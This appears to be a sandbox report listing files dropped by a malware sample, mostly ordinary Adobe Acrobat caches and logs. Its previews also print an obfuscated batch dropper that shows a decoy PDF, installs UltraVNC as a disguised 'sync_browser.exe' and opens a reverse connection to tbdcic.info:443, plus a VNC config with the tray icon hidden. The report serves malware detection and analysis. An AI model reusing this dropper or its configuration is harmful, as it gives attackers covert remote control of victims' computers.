Preview:	{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	5.259094824532125
Encrypted:	false
SSDEEP:	6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJfshHHrPeUkwRe9:YvXKXU8IT5LjIP9GUUUkee9
MD5:	581ECF14F2A0142FA9EABFE47A28022D
SHA1:	9D079C6554565D0C5AA814FC36D4FCF367D217E2
SHA-256:	30303FEEB26B11EF04E076890083179E2885539A4BAD640B87861913E5B97A5A
SHA-512:	0DCCD612F8DFE8FC3ED568803353F73F4A612E8E7D51B79E2F0520DECADB416FDE3423730E182F7E3D717E7F1B2B38E6ED33C135BA9BE28F0ED593696041FF3E
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	282
Entropy (8bit):	5.265147558302632
Encrypted:	false
SSDEEP:	6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJTqgFCrPeUkwRe9:YvXKXU8IT5LjIP9GTq16Ukee9
MD5:	9DFCF4F584F06BDA135C6587893C4886
SHA1:	01678390C264F1803526CE224E56A38E82305E24
SHA-256:	9ECF4150EE6169F60F6B21564D186EB66E5DAD4B01940170F6301C90E81A2B08
SHA-512:	491B63EFED6A07F0DFBB263E3848F7FD88AF1D807D316A36DADB1D5B08281D945D9D197A5949E417E6A2F67E8D31ED50FF76A383E9C442D4C4F42378A8E7323B
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:e:e
MD5:	DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:	802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:	65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2814
Entropy (8bit):	5.141610659461906
Encrypted:	false
SSDEEP:	48:Y/gdDdH/q1aig/jLu6MP/o2MDiv8pIVRB9g4c:m1SW6Tpug
MD5:	EDB9F4FFF0403D693F5FA0D9586DC511
SHA1:	9CEB3992A091B595141E788639B4E156BDA59BCE
SHA-256:	205532FE1253018FDEA36EF6F61DBCA1420586FF6341292FFBDF1D11B2B6A26E
SHA-512:	E5993DB8B55768B9961D9D7DA9C5F78DBE4A441E5FB75819E82685C014CF0958B97704621E3DCBC782F064FF0D750221E63B2BC4412754A42687D918B499AE74
Malicious:	false
Preview:	{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"422e4c568a6739c0264ec028260018fb","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734957592000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"6a27dc83f2da3f7d7d78ec5d66b1e252","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734957592000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"e4a5650065eaa2b06bad7491eca89012","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734957592000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"b97c1cfd8bd4a8fa36882b800307eae1","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734957592000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"db36ccdd33e6602fde94add47a6eddda","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734957592000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"c3acbe1cffce4f368a4067238d178024","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 26, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 26
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	1.3662499336995675
Encrypted:	false
SSDEEP:	24:TLBx/XYKQvGJF7urs9S6bqyKn6ylSTofcNqDuL0gqXKdqEKfS8EKfM1baj0gqF:Tll2GL7msMcKTlS8fcsujxfI76
MD5:	4712E9545EA096EAC030255559AB3551
SHA1:	B6A2967D6893504043E3F3600E1D13FB94BFFD40
SHA-256:	3634D4D3F27D632FD92101A39846BE097CCD9BDBB09A2AE0AC446300099F0168
SHA-512:	5538501D88A440FCAE873BC3846C90B6CCF4E455522E5FA9D448F8381AE53B3B0AB9C1F1598D5374CAABE2421A4E917444B06067644D41D0F03D3148F8FC0ECB
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	1.8421635338052649
Encrypted:	false
SSDEEP:	24:7+tnZ6bqyKn6ylSTofcNqDuL0gq+KdqEKfS8EKfM1banbqdqLKufx/XYKQvGJF7Z:7MZcKTlS8fcsujgfIIqGufl2GL7ms9
MD5:	CEA7DA19D72DFC260DC0642861D24613
SHA1:	D64E2E2CEDEBF14A35352CCF4C3CDBEA5BA20949
SHA-256:	B6C88280FFDABC062DEC49BDC24D2E78F8671497C0D21108E48660F1DCB688B5
SHA-512:	D4B2CE542099DEAFE6C66853BEAA2C3E62A4F519C27FAE4E0F6832553EB72F9605D24BD8289CA96D19BE2F0982AD6DBD5506E199F5743C572EBD9E497636BE2B
Malicious:	false
Preview:	.... .c...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.-.-.-.-.-.-.-.-.-.-.-........................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	66726
Entropy (8bit):	5.392739213842091
Encrypted:	false
SSDEEP:	768:RNOpblrU6TBH44ADKZEg5wGzNTIJlD+cBfgr3/EUvLojhMRE+DrYyu:6a6TZ44ADE5wONsJlD+Mfgj/5RhrK
MD5:	DEA9A77BB5E370911E075E9FFAE32675
SHA1:	292477297AA9145C349254C88ED7B91441196207
SHA-256:	AC0118BF0CAB6D59111DA23BA5E957748790F4C8EC87E3E8441C303AF5C51DFC
SHA-512:	43900FB431576E2748F6F65D6A52FB2F1455EFA81796118EBBF58E3DFB7B2AD2343F483FC8ED073CF227D2FEC09997A364F57F637C0868D13D3B02DAB53FDBAC
Malicious:	false
Preview:	4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\0271695705143540

Download File

Process:	C:\Users\user\Desktop\7q551ugrWe.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	5.595995239629694
Encrypted:	false
SSDEEP:	24:gAULfghONR/OscFDuRCUKk7W26KkTczNJjE/tfW2tfnnLhA6MDxx/m:sLTR/OsSuQTI5rNJkflfnlLGx/m
MD5:	38910F2D879725612BA1097E1F825C1E
SHA1:	99F3C92122A6B333F94304DEED7D55D140BD9456
SHA-256:	6D0A44B3563ADED3F056590B5A6FB848A9E17AF66F89F6C603068A379C372472
SHA-512:	BBAB840AE212EB446B76B10201B137961B83CBA468A9938F3931241D54927A71CD0EEB689263267442D48FFCFF3EF402D11FBC06F6EA5836BCEEB2759C9D77A3
Malicious:	false
Preview:	@echo off.setlocal enabledelayedexpansion.set eK0qrm=nhost.set QJtV61=nne.set gQqfY2=co.set GkbpzI=exe.set Ps8o2E=Lom.set DYmP2A=pdf.set wSMj2e=raVNC.set KvwHVC=%COMPUTERNAME%.set bpAz1S=autore.set HZCo5u=%WINDIR%\Tasks\544191502.cmd.set Tnydkn=tbdcic.info.set fjmNEo=VPANJC.set lqHsNR=443.set RTbyfB=co.set MaNAw8=ct.set bxh0al=Ult.set gyoZzk=sync_browser.set YjXwLS=ini.timeout /t 1.copy "id2rlx.MxYNRd" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%" & start "" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%".timeout /t 1.taskkill /f /im %gyoZzk%.%GkbpzI% .timeout /t 2.copy "WPSela.LSZr7V" "%gyoZzk%.%GkbpzI%".timeout /t 1.copy "wFUH4p.aEmode" "%bxh0al%%wSMj2e%.%YjXwLS%".timeout /t 2.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% .timeout /t 8.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% -%bpAz1S%%gQqfY2%%QJtV61%%MaNAw8% -id:%KvwHVC%_%fjmNEo% -%gQqfY2%%QJtV61%%MaNAw8% %Tnydkn%:%lqHsNR%.timeout /t 2.copy "Nfe70s.UFVVkM" "%RTbyfB%%eK0qrm%.%GkbpzI%".timeout /t 4.:loop.if exist "%HZCo5u%" (. cmd /c "%HZCo5u%". tim

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nfe70s.UFVVkM

Download File

Process:	C:\Users\user\Desktop\7q551ugrWe.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	867840
Entropy (8bit):	6.386550733462827
Encrypted:	false
SSDEEP:	12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
MD5:	0F568F6C821565AB9FF45C7457953789
SHA1:	F948A4C5E01A74B17D0F966615834BA76DC1BADC
SHA-256:	CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
SHA-512:	B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: T8xrZb7nBL.exe, Detection: malicious, Browse Filename: Olz7TmvkEW.exe, Detection: malicious, Browse Filename: mSRW5AfJpC.exe, Detection: malicious, Browse Filename: T8xrZb7nBL.exe, Detection: malicious, Browse Filename: Olz7TmvkEW.exe, Detection: malicious, Browse Filename: mSRW5AfJpC.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V

Download File

Process:	C:\Users\user\Desktop\7q551ugrWe.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1945368
Entropy (8bit):	6.532894678367002
Encrypted:	false
SSDEEP:	24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
MD5:	749B3A68B9C5325D592822EE7C2C17EC
SHA1:	3EDE6BB2DF969432358A5883CF226971FDE8B7D4
SHA-256:	F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
SHA-512:	B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
Malicious:	true
Yara Hits:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: T8xrZb7nBL.exe, Detection: malicious, Browse Filename: Olz7TmvkEW.exe, Detection: malicious, Browse Filename: mSRW5AfJpC.exe, Detection: malicious, Browse Filename: T8xrZb7nBL.exe, Detection: malicious, Browse Filename: Olz7TmvkEW.exe, Detection: malicious, Browse Filename: mSRW5AfJpC.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......\|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......\|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\id2rlx.MxYNRd

Download File

Process:	C:\Users\user\Desktop\7q551ugrWe.exe
File Type:	PDF document, version 1.5 (zip deflate encoded)
Category:	dropped
Size (bytes):	605114
Entropy (8bit):	7.931189302613814
Encrypted:	false
SSDEEP:	12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
MD5:	A18D0E3EEEF0D6E099BAB52F8B041446
SHA1:	4879750BEC07AA11629950310AF538E9A9D91D20
SHA-256:	95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
SHA-512:	6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
Malicious:	false
Preview:	%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:\|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi.....T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\wFUH4p.aEmode

Download File

Process:	C:\Users\user\Desktop\7q551ugrWe.exe
File Type:	Generic INItialization configuration [admin]
Category:	dropped
Size (bytes):	858
Entropy (8bit):	5.216893826927931
Encrypted:	false
SSDEEP:	24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
MD5:	7EB58E0D2316B8ECE029C804BF4BA8FA
SHA1:	A2A8E2518D12A53CCFCAB925C124933172044D08
SHA-256:	71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
SHA-512:	3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
Malicious:	false
Preview:	[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..

C:\Users\user\AppData\Local\Temp\MSIe8f42.LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	3.524398495091119
Encrypted:	false
SSDEEP:	6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rOlAkY9:Qw946cPbiOxDlbYnuRKDlDm
MD5:	7D6EA27DDC9CF9FBCABDE5A6FC40B722
SHA1:	B320882E4F569DC01CD766CA6FE369ACE28678B9
SHA-256:	29F80D593CC4C2984AC8F933BC8B7EEAE2E3A1EDEE575E0FF2117154A4D4A5C7
SHA-512:	89FCBF5FC911529BEC41237A6C7EE71FB7ADB1ED2D7B38FE52F1668EDF99464CE1E4DC40D72EDADF2FE68B861C102B06B199C0C0DAF28238DDFA5BEDB270EBAD
Malicious:	false
Preview:	..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.3./.1.2./.2.0.2.4. . .0.7.:.3.9.:.4.9. .=.=.=.....

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-23 07-39-43-729.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393)
Category:	dropped
Size (bytes):	16525
Entropy (8bit):	5.330589339471305
Encrypted:	false
SSDEEP:	384:usQfQQjZyDzISMjg0svDBjA49Y0/sQHpMVhrSWD0Wny6WxIWd44mJmtaEKHvMMwh:Ink
MD5:	5BC0A308794F062FEC40F3016568DF9F
SHA1:	14149448191AB45E99011CBBEF39F2A9A03A0D15
SHA-256:	00D910C49F2885F6810F4019A916EFA52F12881CBF1525853D0C184E1B796473
SHA-512:	CF12E0787C1C2A129BE61C4572CF8A28FC48039B2ADFD1816E58078D8DD900771442F210C545AD9B3F4EAEC23F6F1480F7BBF262B6A631160B20D0785BC17242
Malicious:	false
Preview:	SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:171+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="SetConfig:

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393), with CRLF line terminators
Category:	dropped
Size (bytes):	15114
Entropy (8bit):	5.388276317030341
Encrypted:	false
SSDEEP:	384:Q+iQ1j2eq6pd/56o1z6V2ElggfU2kQEdZOrhvbxgtgUDFSX/2N/hk/kZcBrzxiKF:vhS
MD5:	537DFFABFB44D6719C5451C3C699CAB7
SHA1:	1FFF59859FA11D4D671B60BF011E9D0E23F281D9
SHA-256:	DA9496B57C279F7C5B2490370FA6A793AF581B4DB7F29D602BF7B5BAE89B894E
SHA-512:	05F0E46D6B65E2F5BEC98F61CF31AA4A61E6B88F842FF12BCFAB63B780D9D4B22320D7BA1A21E65ED5E89E48A548DC2A1393805597FFCFC192BAF44BD90EA2C2
Malicious:	false
Preview:	SessionID=f986d65a-d315-4d8b-9fc9-80ab4ad625ea.1734957583743 Timestamp=2024-12-23T07:39:43:743-0500 ThreadID=7916 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=f986d65a-d315-4d8b-9fc9-80ab4ad625ea.1734957583743 Timestamp=2024-12-23T07:39:43:745-0500 ThreadID=7916 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=f986d65a-d315-4d8b-9fc9-80ab4ad625ea.1734957583743 Timestamp=2024-12-23T07:39:43:745-0500 ThreadID=7916 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=f986d65a-d315-4d8b-9fc9-80ab4ad625ea.1734957583743 Timestamp=2024-12-23T07:39:43:746-0500 ThreadID=7916 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=f986d65a-d315-4d8b-9fc9-80ab4ad625ea.1734957583743 Timestamp=2024-12-23T07:39:43:746-0500 ThreadID=7916 Component=ngl-lib_NglAppLib Description="SetConf

C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29752
Entropy (8bit):	5.396000912067527
Encrypted:	false
SSDEEP:	192:icbENIn5cbqlcbgIpLcbJcb4I5jcbKcbQIrxcbm2MRYcbItI0GcbD:8qnXopZ50rqMR2K0X
MD5:	539E628726EF169D8CF51154016C897E
SHA1:	0125320A89D228BACDD9B6AB2237CD39AB4EDFB2
SHA-256:	354025791A2F172B7064D47C3DE037ADB2C5B630D2F9C12818E660BB386193F4
SHA-512:	065F9F8FCAC739B72E5456C1DD21C60EA65D1997164F05C2BECAAEE3CED8C9A02A56BAC5BE7F6D9CA2006EBC3744EB1011F6A858D103BADCF20257125F9E40B2
Malicious:	false
Preview:	05-10-2023 10:01:02:.---2---..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : *************************************..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : ***********************************..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : **** Starting new session ******..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:01:02:.Closing File..05-10-

C:\Users\user\AppData\Local\Temp\acrocef_low\5c6bfbd4-7989-470e-8d29-de8fa807fe2f.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Category:	dropped
Size (bytes):	758601
Entropy (8bit):	7.98639316555857
Encrypted:	false
SSDEEP:	12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
MD5:	3A49135134665364308390AC398006F1
SHA1:	28EF4CE5690BF8A9E048AF7D30688120DAC6F126
SHA-256:	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
SHA-512:	BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
Malicious:	false
